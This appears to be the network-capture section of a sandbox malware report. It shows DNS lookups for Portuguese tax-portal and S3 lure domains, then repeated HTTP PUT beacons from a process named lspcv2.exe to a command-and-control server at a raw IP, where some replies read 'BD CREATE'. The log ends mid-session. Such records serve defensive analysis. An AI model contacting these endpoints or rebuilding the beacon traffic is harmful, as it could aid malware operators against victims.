Nov 14, 2024 14:59:54.203071117 CET | 192.168.2.4 | 1.1.1.1 | 0x31a1 | Standard query (0) | www.portaldasfinancas.gov.pt | 65 | IN (0x0001) | false
Nov 14, 2024 14:59:54.284003019 CET | 192.168.2.4 | 1.1.1.1 | 0xdcda | Standard query (0) | www.acesso.gov.pt | A (IP address) | IN (0x0001) | false
Nov 14, 2024 14:59:54.284329891 CET | 192.168.2.4 | 1.1.1.1 | 0xf4b7 | Standard query (0) | www.acesso.gov.pt | 65 | IN (0x0001) | false
Nov 14, 2024 15:00:13.185830116 CET | 192.168.2.4 | 1.1.1.1 | 0x328b | Standard query (0) | happychristmaslegado.s3.eu-north-1.amazonaws.com | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:00:42.488533974 CET | 192.168.2.4 | 1.1.1.1 | 0x8584 | Standard query (0) | happychristmaslegado.s3.eu-north-1.amazonaws.com | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:00:49.731833935 CET | 192.168.2.4 | 1.1.1.1 | 0xb520 | Standard query (0) | s3.timeweb.com | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:01:02.456974983 CET | 192.168.2.4 | 1.1.1.1 | 0x1198 | Standard query (0) | s3.timeweb.com | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:01:32.739669085 CET | 192.168.2.4 | 1.1.1.1 | 0xfec5 | Standard query (0) | s3.timeweb.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 14, 2024 14:59:48.262023926 CET | 1.1.1.1 | 192.168.2.4 | 0x57ea | No error (0) | privacidadeepreferenciapt.s3.eu-north-1.amazonaws.com | s3-r-w.eu-north-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 14:59:48.262023926 CET | 1.1.1.1 | 192.168.2.4 | 0x57ea | No error (0) | s3-r-w.eu-north-1.amazonaws.com | | 16.12.9.14 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 14:59:48.262023926 CET | 1.1.1.1 | 192.168.2.4 | 0x57ea | No error (0) | s3-r-w.eu-north-1.amazonaws.com | | 3.5.218.52 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 14:59:49.629348993 CET | 1.1.1.1 | 192.168.2.4 | 0x7b9d | No error (0) | www.acesso.gov.pt | | 62.28.254.215 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 14:59:52.017858028 CET | 1.1.1.1 | 192.168.2.4 | 0xf816 | No error (0) | static.portaldasfinancas.gov.pt | staticpf.azureedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 14:59:52.017858028 CET | 1.1.1.1 | 192.168.2.4 | 0xf816 | No error (0) | scdn3.wpc.84635.rhocdn.net | sni1gl.wpc.rhocdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 14:59:52.017858028 CET | 1.1.1.1 | 192.168.2.4 | 0xf816 | No error (0) | sni1gl.wpc.rhocdn.net | | 152.199.21.175 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 14:59:52.026840925 CET | 1.1.1.1 | 192.168.2.4 | 0x4d6f | No error (0) | static.portaldasfinancas.gov.pt | staticpf.azureedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 14:59:52.026840925 CET | 1.1.1.1 | 192.168.2.4 | 0x4d6f | No error (0) | scdn3.wpc.84635.rhocdn.net | sni1gl.wpc.rhocdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 14:59:53.432051897 CET | 1.1.1.1 | 192.168.2.4 | 0x5a87 | No error (0) | static.portaldasfinancas.gov.pt | staticpf.azureedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 14:59:53.432051897 CET | 1.1.1.1 | 192.168.2.4 | 0x5a87 | No error (0) | scdn3.wpc.84635.rhocdn.net | sni1gl.wpc.rhocdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 14:59:53.432051897 CET | 1.1.1.1 | 192.168.2.4 | 0x5a87 | No error (0) | sni1gl.wpc.rhocdn.net | | 152.199.21.175 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 14:59:53.439204931 CET | 1.1.1.1 | 192.168.2.4 | 0x7277 | No error (0) | static.portaldasfinancas.gov.pt | staticpf.azureedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 14:59:53.439204931 CET | 1.1.1.1 | 192.168.2.4 | 0x7277 | No error (0) | scdn3.wpc.84635.rhocdn.net | sni1gl.wpc.rhocdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 14:59:53.856410980 CET | 1.1.1.1 | 192.168.2.4 | 0xc77e | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
Nov 14, 2024 14:59:53.856575012 CET | 1.1.1.1 | 192.168.2.4 | 0x4380 | No error (0) | www.google.com | | 142.250.185.196 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 14:59:54.211344004 CET | 1.1.1.1 | 192.168.2.4 | 0xa808 | No error (0) | www.portaldasfinancas.gov.pt | | 62.28.254.212 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 14:59:54.339667082 CET | 1.1.1.1 | 192.168.2.4 | 0xdcda | No error (0) | www.acesso.gov.pt | | 62.28.254.215 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:00:13.196748972 CET | 1.1.1.1 | 192.168.2.4 | 0x328b | No error (0) | happychristmaslegado.s3.eu-north-1.amazonaws.com | s3-r-w.eu-north-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 15:00:13.196748972 CET | 1.1.1.1 | 192.168.2.4 | 0x328b | No error (0) | s3-r-w.eu-north-1.amazonaws.com | | 16.12.9.46 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:00:13.196748972 CET | 1.1.1.1 | 192.168.2.4 | 0x328b | No error (0) | s3-r-w.eu-north-1.amazonaws.com | | 3.5.217.57 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:00:42.513015985 CET | 1.1.1.1 | 192.168.2.4 | 0x8584 | No error (0) | happychristmaslegado.s3.eu-north-1.amazonaws.com | s3-r-w.eu-north-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 15:00:42.513015985 CET | 1.1.1.1 | 192.168.2.4 | 0x8584 | No error (0) | s3-r-w.eu-north-1.amazonaws.com | | 16.12.9.10 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:00:42.513015985 CET | 1.1.1.1 | 192.168.2.4 | 0x8584 | No error (0) | s3-r-w.eu-north-1.amazonaws.com | | 3.5.216.50 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:00:49.740061045 CET | 1.1.1.1 | 192.168.2.4 | 0xb520 | No error (0) | s3.timeweb.com | | 92.53.116.138 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:01:02.464973927 CET | 1.1.1.1 | 192.168.2.4 | 0x1198 | No error (0) | s3.timeweb.com | | 92.53.116.138 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:01:32.881056070 CET | 1.1.1.1 | 192.168.2.4 | 0xfec5 | No error (0) | s3.timeweb.com | | 92.53.116.138 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49790 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe

Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:00:37.491535902 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:00:37.496640921 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:00:38.395720005 CET | 175 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:38 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 9
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 42 44 20 43 52 45 41 54 45
Data Ascii: BD CREATE


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  1 | 192.168.2.4 | 49791 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:00:38.514153957 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:38.519058943 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:39.420476913 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:39 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  2 | 192.168.2.4 | 49792 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:00:39.547086954 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:39.552305937 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:40.432455063 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:40 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  3 | 192.168.2.4 | 49793 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:00:40.693531990 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:40.698432922 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:41.583920956 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:41 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  4 | 192.168.2.4 | 49794 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:00:41.703129053 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:41.708165884 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:42.625482082 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:42 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  5 | 192.168.2.4 | 49795 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:00:42.750078917 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:42.755367994 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:43.643188000 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:43 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  6 | 192.168.2.4 | 49797 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:00:43.769917011 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:43.777432919 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:44.662372112 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:44 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  7 | 192.168.2.4 | 49799 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:00:44.780802965 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:44.785783052 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:45.697779894 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:45 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  8 | 192.168.2.4 | 49805 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:00:45.812935114 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:45.818394899 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:46.724915981 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:46 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  9 | 192.168.2.4 | 49810 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:00:46.843168974 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:46.848722935 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:47.720372915 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:47 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  10 | 192.168.2.4 | 49816 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:00:47.892995119 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:47.902106047 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:48.743736982 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:48 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  11 | 192.168.2.4 | 49822 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:00:48.637190104 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:48.643723965 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:49.703496933 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:49 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  12 | 192.168.2.4 | 49823 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:00:48.858036041 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:48.863378048 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:49.754165888 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:49 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49831 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:00:49.875147104 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:00:49.882365942 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:00:50.781883001 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:50 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49837 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:00:50.905412912 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:00:50.910517931 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:00:51.784434080 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:51 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49844 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:00:51.246505976 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:00:51.252079010 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:00:52.134505033 CET | 175 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:51 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 9
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 42 44 20 43 52 45 41 54 45
Data Ascii: BD CREATE


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49848 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:00:51.906451941 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:00:51.911616087 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:00:52.794998884 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:52 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49851 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:00:52.246241093 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:00:52.251518965 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:00:53.131566048 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:52 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49857 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:00:52.930322886 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:00:52.937977076 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:00:53.833594084 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:53 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49858 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:00:53.304836035 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
